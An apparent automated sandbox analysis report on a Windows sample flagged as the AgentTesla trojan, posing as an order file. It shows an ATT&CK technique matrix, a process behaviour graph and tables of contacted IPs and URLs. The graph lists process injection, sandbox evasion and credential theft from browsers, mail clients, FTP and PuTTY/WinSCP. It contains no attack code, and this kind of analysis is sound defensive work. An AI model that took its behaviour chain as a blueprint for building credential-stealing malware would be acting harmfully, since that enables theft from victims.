                    Valid Accounts                    		1
                    Deobfuscate/Decode Files or Information                    		1
                    Input Capture                    		35
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		Junk DataExfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    Registry Run Keys / Startup Folder                    		1
                    Access Token Manipulation                    		2
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		1
                    Query Registry                    		SMB/Windows Admin Shares1
                    Email Collection                    		SteganographyAutomated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook311
                    Process Injection                    		2
                    Software Packing                    		NTDS531
                    Security Software Discovery                    		Distributed Component Object Model1
                    Input Capture                    		Protocol ImpersonationTraffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                    Registry Run Keys / Startup Folder                    		1
                    DLL Side-Loading                    		LSA Secrets2
                    Process Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials261
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Valid Accounts                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Modify Registry                    		Proc Filesystem1
                    Remote System Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Access Token Manipulation                    		/etc/passwd and /etc/shadow1
                    System Network Configuration Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron261
                    Virtualization/Sandbox Evasion                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd311
                    Process Injection                    		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                    Hidden Files and Directories                    		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1463465 Sample: Orden#46789_2024_Optoflux_m... Startdate: 27/06/2024 Architecture: WINDOWS Score: 100 87 Found malware configuration 2->87 89 Malicious sample detected (through community Yara rule) 2->89 91 Multi AV Scanner detection for submitted file 2->91 93 7 other signatures 2->93 8 vexplorerez.exe 17 5 2->8         started        12 Orden#46789_2024_Optoflux_mexico_sderls.exe 14 3 2->12         started        15 chrome.exe 2->15         started        process3 dnsIp4 77 216.58.212.132 GOOGLEUS United States 8->77 121 Multi AV Scanner detection for dropped file 8->121 123 Machine Learning detection for dropped file 8->123 125 Writes to foreign memory regions 8->125 131 2 other signatures 8->131 17 InstallUtil.exe 8->17         started        21 InstallUtil.exe 8->21         started        23 Acrobat.exe 8->23         started        79 142.250.185.132 GOOGLEUS United States 12->79 63 Orden#46789_2024_O...xico_sderls.exe.log, ASCII 12->63 dropped 127 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 12->127 129 Hides that the sample has been downloaded from the Internet (zone.identifier) 12->129 25 cmd.exe 3 12->25         started        28 cmd.exe 1 12->28         started        81 192.168.2.11 unknown unknown 15->81 83 239.255.255.250 unknown Reserved 15->83 30 chrome.exe 15->30         started        file5 signatures6 process7 dnsIp8 65 208.95.112.1 TUT-ASUS United States 17->65 67 185.230.214.164 COMPUTERLINEComputerlineSchlierbachSwitzerlandCH Netherlands 17->67 95 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->95 97 Tries to steal Mail credentials (via file / registry access) 17->97 99 Tries to harvest and steal ftp login credentials 17->99 101 Tries to harvest and steal browser information (history, passwords, etc) 17->101 103 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 21->103 105 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 21->105 107 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 21->107 32 AcroCEF.exe 23->32         started        59 C:\Users\user\AppData\...\vexplorerez.exe, PE32 25->59 dropped 61 C:\Users\...\vexplorerez.exe:Zone.Identifier, ASCII 25->61 dropped 109 Uses ping.exe to sleep 25->109 34 vexplorerez.exe 3 25->34         started        37 conhost.exe 25->37         started        39 PING.EXE 1 25->39         started        41 PING.EXE 1 25->41         started        111 Uses ping.exe to check the status of other devices and networks 28->111 43 PING.EXE 1 28->43         started        46 conhost.exe 28->46         started        48 reg.exe 1 1 28->48         started        69 142.250.186.100 GOOGLEUS United States 30->69 71 1.1.1.1 CLOUDFLARENETUS Australia 30->71 73 2 other IPs or domains 30->73 file9 signatures10 process11 dnsIp12 50 AcroCEF.exe 32->50         started        113 Writes to foreign memory regions 34->113 115 Allocates memory in foreign processes 34->115 117 Hides that the sample has been downloaded from the Internet (zone.identifier) 34->117 119 Injects a PE file into a foreign processes 34->119 53 Acrobat.exe 34->53         started        55 InstallUtil.exe 34->55         started        57 InstallUtil.exe 34->57         started        85 127.0.0.1 unknown unknown 43->85 signatures13 process14 dnsIp15 75 23.41.168.139 ZAYO-6461US United States 50->75

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Orden#46789_2024_Optoflux_mexico_sderls.exe68%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                    Orden#46789_2024_Optoflux_mexico_sderls.exe73%VirustotalBrowse
                    Orden#46789_2024_Optoflux_mexico_sderls.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\vexplorerez.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\vexplorerez.exe68%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://bugs.webkit.org/show_bug.cgi?id=1368510%URL Reputationsafe
                    https://bugs.webkit.org/show_bug.cgi?id=1368510%URL Reputationsafe
                    http://jquery.org/license0%URL Reputationsafe
                    https://jsperf.com/thor-indexof-vs-for/50%URL Reputationsafe
                    https://bugs.jquery.com/ticket/123590%URL Reputationsafe
                    http://jqueryui.com0%URL Reputationsafe
                    https://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/0%URL Reputationsafe
                    https://html.spec.whatwg.org/#strip-and-collapse-whitespace0%URL Reputationsafe
                    https://promisesaplus.com/#point-750%URL Reputationsafe
                    https://web.archive.org/web/20141116233347/http://fluidproject.org/blog/2008/01/09/getting-setting-a0%URL Reputationsafe
                    https://drafts.csswg.org/cssom/#common-serializing-idioms0%URL Reputationsafe
                    https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabled0%URL Reputationsafe
                    https://bugs.webkit.org/show_bug.cgi?id=290840%URL Reputationsafe
                    https://html.spec.whatwg.org/multipage/forms.html#concept-option-disabled0%URL Reputationsafe
                    https://bugs.chromium.org/p/chromium/issues/detail?id=3786070%URL Reputationsafe
                    https://bugzilla.mozilla.org/show_bug.cgi?id=6877870%URL Reputationsafe
                    http://ip-api.com0%URL Reputationsafe
                    https://bugs.chromium.org/p/chromium/issues/detail?id=4702580%URL Reputationsafe
                    https://bugs.jquery.com/ticket/133780%URL Reputationsafe
                    https://promisesaplus.com/#point-640%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://promisesaplus.com/#point-610%URL Reputationsafe
                    https://drafts.csswg.org/cssom/#resolved-values0%URL Reputationsafe
                    https://account.dyn.com/0%URL Reputationsafe
                    https://bugs.chromium.org/p/chromium/issues/detail?id=5893470%URL Reputationsafe
                    https://html.spec.whatwg.org/multipage/syntax.html#attributes-20%URL Reputationsafe
                    https://promisesaplus.com/#point-590%URL Reputationsafe
                    https://jsperf.com/getall-vs-sizzle/20%URL Reputationsafe
                    https://promisesaplus.com/#point-570%URL Reputationsafe
                    https://promisesaplus.com/#point-540%URL Reputationsafe
                    https://html.spec.whatwg.org/multipage/forms.html#category-listed0%URL Reputationsafe
                    https://html.spec.whatwg.org/multipage/scripting.html#selector-disabled0%URL Reputationsafe
                    https://developer.mozilla.org/en-US/docs/CSS/display0%URL Reputationsafe
                    https://jquery.org/license0%URL Reputationsafe
                    https://jquery.com/0%URL Reputationsafe
                    https://bugs.webkit.org/show_bug.cgi?id=1373370%URL Reputationsafe
                    https://html.spec.whatwg.org/multipage/scripting.html#selector-enabled0%URL Reputationsafe
                    https://promisesaplus.com/#point-480%URL Reputationsafe
                    https://www.google.com/intl/en/about/products?tab=wh0%Avira URL Cloudsafe
                    http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p0%Avira URL Cloudsafe
                    https://photos.google.com/?tab=wq&pageId=none0%Avira URL Cloudsafe
                    https://sizzlejs.com/0%URL Reputationsafe
                    https://bugs.chromium.org/p/chromium/issues/detail?id=4498570%URL Reputationsafe
                    http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                    http://modernizr.com/download/#-shiv-printshiv-load-mq-cssclasses-svg0%Avira URL Cloudsafe
                    https://github.com/Pavich7/P-Browser-Builder/wiki/P-Browser-Builder-Guild#install-p-browser-builder-0%Avira URL Cloudsafe
                    https://csp.withgoogle.com/csp/gws/other-hp0%Avira URL Cloudsafe
                    https://news.google.com/?tab=wn0%Avira URL Cloudsafe
                    http://pavichdev.ddns.net/api/v2-pbb/newsfeed/nf1_date.txt0%Avira URL Cloudsafe
                    https://docs.google.com/document/?usp=docs_alc0%Avira URL Cloudsafe
                    http://modernizr.com/download/#-shiv-printshiv-load-mq-cssclasses-svg0%VirustotalBrowse
                    https://www.google.com/intl/en/about/products?tab=wh0%VirustotalBrowse
                    https://news.google.com/?tab=wn0%VirustotalBrowse
                    http://schema.org/WebPage0%Avira URL Cloudsafe
                    http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p0%VirustotalBrowse
                    https://csp.withgoogle.com/csp/gws/other-hp0%VirustotalBrowse
                    https://sb.scorecardresearch.com/p?c1=2&c2=17183199&ns_site=0%Avira URL Cloudsafe
                    https://photos.google.com/?tab=wq&pageId=none0%VirustotalBrowse
                    https://github.com/Pavich7/P-Browser-Builder/wiki/P-Browser-Builder-Guild#install-p-browser-builder-0%VirustotalBrowse
                    http://schema.org/WebPage0%VirustotalBrowse
                    http://pavichdev.ddns.net/old/Home.html#feedbackintro=Application0%Avira URL Cloudsafe
                    http://purl.oen0%Avira URL Cloudsafe
                    https://github.com/Pavich7/P-Browser-Builder/wiki/P-Browser-Builder-Guild#building-a-p-browser-app-f0%Avira URL Cloudsafe
                    https://github.com/eslint/eslint/issues/61250%Avira URL Cloudsafe
                    http://pavichdev.ddns.net/api/v2-pbb/newsfeed/nf1_date.txt1%VirustotalBrowse
                    https://github.com/jquery/jquery/pull/557)0%Avira URL Cloudsafe
                    http://pavichdev.ddns.net/old/Home.html#feedbackintro=Application1%VirustotalBrowse
                    https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anon0%Avira URL Cloudsafe
                    https://github.com/Pavich7/P-Browser-Builder/wiki/P-Browser-Builder-Guild#building-a-p-browser-app-f0%VirustotalBrowse
                    http://status.thawte.com0:0%Avira URL Cloudsafe
                    https://github.com/jquery/jquery/pull/557)0%VirustotalBrowse
                    https://consultapublicamx.inai.org.mx/vut-web/0%Avira URL Cloudsafe
                    https://www.google.com/finance?tab=we0%Avira URL Cloudsafe
                    https://docs.google.com/document/?usp=docs_alc0%VirustotalBrowse
                    http://getbootstrap.com)0%Avira URL Cloudsafe
                    https://github.com/eslint/eslint/issues/61250%VirustotalBrowse
                    http://www.google.com0%Avira URL Cloudsafe
                    https://consultapublicamx.inai.org.mx/vut-web/0%VirustotalBrowse
                    https://github.com/Pavich7/P-Browser-Builder/releases/0%Avira URL Cloudsafe
                    http://www.blogger.com/?tab=wj0%Avira URL Cloudsafe
                    http://www.google.com0%VirustotalBrowse
                    http://www.gob.mx/0%Avira URL Cloudsafe
                    http://www.blogger.com/?tab=wj0%VirustotalBrowse
                    https://framework-gb.cdn.gob.mx/0%Avira URL Cloudsafe
                    http://www.google.com/mobile/?hl=en&tab=wD0%Avira URL Cloudsafe
                    https://www.google.com/finance?tab=we1%VirustotalBrowse
                    https://www.gob.mx/0%Avira URL Cloudsafe
                    https://github.com/Pavich7/P-Browser-Builder/releases/0%VirustotalBrowse
                    https://datos.gob.mx/0%Avira URL Cloudsafe
                    http://www.google.com/mobile/?hl=en&tab=wD0%VirustotalBrowse
                    https://www.gob.mx/subscribe0%Avira URL Cloudsafe
                    https://framework-gb.cdn.gob.mx/0%VirustotalBrowse
                    https://datos.gob.mx/0%VirustotalBrowse
                    https://www.niklas-menke.de/projekte/smartmeter-auslesen/modbus/0%Avira URL Cloudsafe
                    http://www.ordenjuridico.gob.mx/0%Avira URL Cloudsafe
                    http://www.gob.mx/1%VirustotalBrowse
                    https://www.gob.mx/1%VirustotalBrowse
                    http://www.ordenjuridico.gob.mx/0%VirustotalBrowse
                    https://bugzilla.mozilla.org/show_bug.cgi?id=6492850%Avira URL Cloudsafe
                    https://www.niklas-menke.de/projekte/smartmeter-auslesen/modbus/0%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://verificacfdi.facturaelectronica.sat.gob.mx/?id=39CA617E-9953-41BD-9564-C41A1E1C5584&re=OOMM710314363&rr=PCM910225B86&tt=6090.00&fe=aUIAsQ==false
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://www.google.com/intl/en/about/products?tab=whvexplorerez.exe, 00000010.00000002.3848959756.000000000339F000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000011.00000002.4037955042.0000000002A6F000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/Pavich7/P-Browser-Builder/wiki/P-Browser-Builder-Guild#install-p-browser-builder-Orden#46789_2024_Optoflux_mexico_sderls.exe, vexplorerez.exe.11.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://bugs.webkit.org/show_bug.cgi?id=136851chromecache_190.22.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://jquery.org/licensechromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://modernizr.com/download/#-shiv-printshiv-load-mq-cssclasses-svgchromecache_213.22.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://jsperf.com/thor-indexof-vs-for/5chromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://photos.google.com/?tab=wq&pageId=nonevexplorerez.exe, 00000011.00000002.4037955042.0000000002A6F000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://bugs.jquery.com/ticket/12359chromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://cdp.thawte.com/ThawteTLSRSACAG1.crl0pInstallUtil.exe, 0000001A.00000002.4617818400.0000000005B70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4607747615.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4606030042.0000000000C8B000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4607747615.0000000002984000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://csp.withgoogle.com/csp/gws/other-hpOrden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2980414937.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000010.00000002.3848959756.000000000339F000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000011.00000002.4037955042.0000000002A6F000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://jqueryui.comchromecache_192.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/chromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://html.spec.whatwg.org/#strip-and-collapse-whitespacechromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://news.google.com/?tab=wnvexplorerez.exe, 00000010.00000002.3848959756.000000000339F000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://pavichdev.ddns.net/api/v2-pbb/newsfeed/nf1_date.txtOrden#46789_2024_Optoflux_mexico_sderls.exe, vexplorerez.exe.11.drfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://promisesaplus.com/#point-75chromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://web.archive.org/web/20141116233347/http://fluidproject.org/blog/2008/01/09/getting-setting-achromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://docs.google.com/document/?usp=docs_alcvexplorerez.exe, 00000011.00000002.4037955042.0000000002A6F000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://drafts.csswg.org/cssom/#common-serializing-idiomschromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabledchromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://schema.org/WebPagevexplorerez.exe, 00000011.00000002.4037955042.0000000002A6F000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://bugs.webkit.org/show_bug.cgi?id=29084chromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://sb.scorecardresearch.com/p?c1=2&c2=17183199&ns_site=chromecache_208.22.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://pavichdev.ddns.net/old/Home.html#feedbackintro=ApplicationOrden#46789_2024_Optoflux_mexico_sderls.exe, vexplorerez.exe.11.drfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://purl.oenvexplorerez.exe, 00000011.00000002.4073896500.000000000658F000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/Pavich7/P-Browser-Builder/wiki/P-Browser-Builder-Guild#building-a-p-browser-app-fOrden#46789_2024_Optoflux_mexico_sderls.exe, vexplorerez.exe.11.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/eslint/eslint/issues/6125chromecache_190.22.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://html.spec.whatwg.org/multipage/forms.html#concept-option-disabledchromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://github.com/jquery/jquery/pull/557)chromecache_190.22.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://bugs.chromium.org/p/chromium/issues/detail?id=378607chromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anonchromecache_190.22.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://status.thawte.com0:InstallUtil.exe, 0000001A.00000002.4617818400.0000000005B70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4607747615.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4606030042.0000000000C8B000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4607747615.0000000002984000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://consultapublicamx.inai.org.mx/vut-web/chromecache_208.22.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.google.com/finance?tab=wevexplorerez.exe, 00000011.00000002.4037955042.0000000002A6F000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://getbootstrap.com)chromecache_192.22.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://bugzilla.mozilla.org/show_bug.cgi?id=687787chromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://ip-api.comInstallUtil.exe, 0000001A.00000002.4607747615.0000000002921000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.google.comOrden#46789_2024_Optoflux_mexico_sderls.exe, vexplorerez.exe.11.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://bugs.chromium.org/p/chromium/issues/detail?id=470258chromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://bugs.jquery.com/ticket/13378chromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://github.com/Pavich7/P-Browser-Builder/releases/Orden#46789_2024_Optoflux_mexico_sderls.exe, vexplorerez.exe.11.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://promisesaplus.com/#point-64chromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameOrden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2980414937.0000000002881000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000010.00000002.3848959756.0000000003371000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000011.00000002.4037955042.0000000002A4D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4607747615.0000000002921000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.blogger.com/?tab=wjvexplorerez.exe, 00000011.00000002.4037955042.0000000002A6F000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.gob.mx/chromecache_195.22.drfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://framework-gb.cdn.gob.mx/chromecache_208.22.dr, chromecache_213.22.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.google.com/mobile/?hl=en&tab=wDvexplorerez.exe, 00000010.00000002.3848959756.000000000339F000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://promisesaplus.com/#point-61chromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.gob.mx/chromecache_208.22.drfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://datos.gob.mx/chromecache_208.22.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.gob.mx/subscribechromecache_208.22.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://drafts.csswg.org/cssom/#resolved-valueschromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://pavichdev.ddns.net/api/v1-act/activate.php?ver=PBrowserBuilderOrden#46789_2024_Optoflux_mexico_sderls.exe, vexplorerez.exe.11.drfalseunknown
                      https://account.dyn.com/Orden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2983258832.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, Orden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2983258832.0000000003969000.00000004.00000800.00020000.00000000.sdmp, Orden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2983258832.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000010.00000002.3865481800.0000000004734000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000010.00000002.3865481800.0000000004371000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000010.00000002.3865481800.0000000004652000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000011.00000002.4064362259.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000011.00000002.4064362259.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000018.00000002.3511312688.00000000007C2000.00000040.00000400.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://bugs.chromium.org/p/chromium/issues/detail?id=589347chromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.niklas-menke.de/projekte/smartmeter-auslesen/modbus/Orden#46789_2024_Optoflux_mexico_sderls.exe, vexplorerez.exe.11.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.ordenjuridico.gob.mx/chromecache_208.22.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://bugzilla.mozilla.org/show_bug.cgi?id=649285chromecache_190.22.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://drive.google.com/?tab=wovexplorerez.exe, 00000010.00000002.3848959756.000000000339F000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://html.spec.whatwg.org/multipage/syntax.html#attributes-2chromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://promisesaplus.com/#point-59chromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://jsperf.com/getall-vs-sizzle/2chromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://promisesaplus.com/#point-57chromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://pavichdev.ddns.net/api/v2-pbb/newsfeed/nf1_title.txtOrden#46789_2024_Optoflux_mexico_sderls.exe, vexplorerez.exe.11.drfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/eslint/eslint/issues/3229chromecache_190.22.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://mail.google.com/mail/?tab=wmvexplorerez.exe, 00000010.00000002.3848959756.000000000339F000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://127.0.0.1:8088/Orden#46789_2024_Optoflux_mexico_sderls.exe, vexplorerez.exe.11.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://promisesaplus.com/#point-54chromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0InstallUtil.exe, 0000001A.00000002.4617818400.0000000005B70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4607747615.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4606030042.0000000000C8B000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4607747615.0000000002984000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://twitter.com/GobiernoMXchromecache_208.22.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://smtp.zoho.euInstallUtil.exe, 0000001A.00000002.4607747615.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4607747615.0000000002984000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://html.spec.whatwg.org/multipage/forms.html#category-listedchromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://html.spec.whatwg.org/multipage/scripting.html#selector-disabledchromecache_190.22.drfalse
                      • URL Reputation: safe
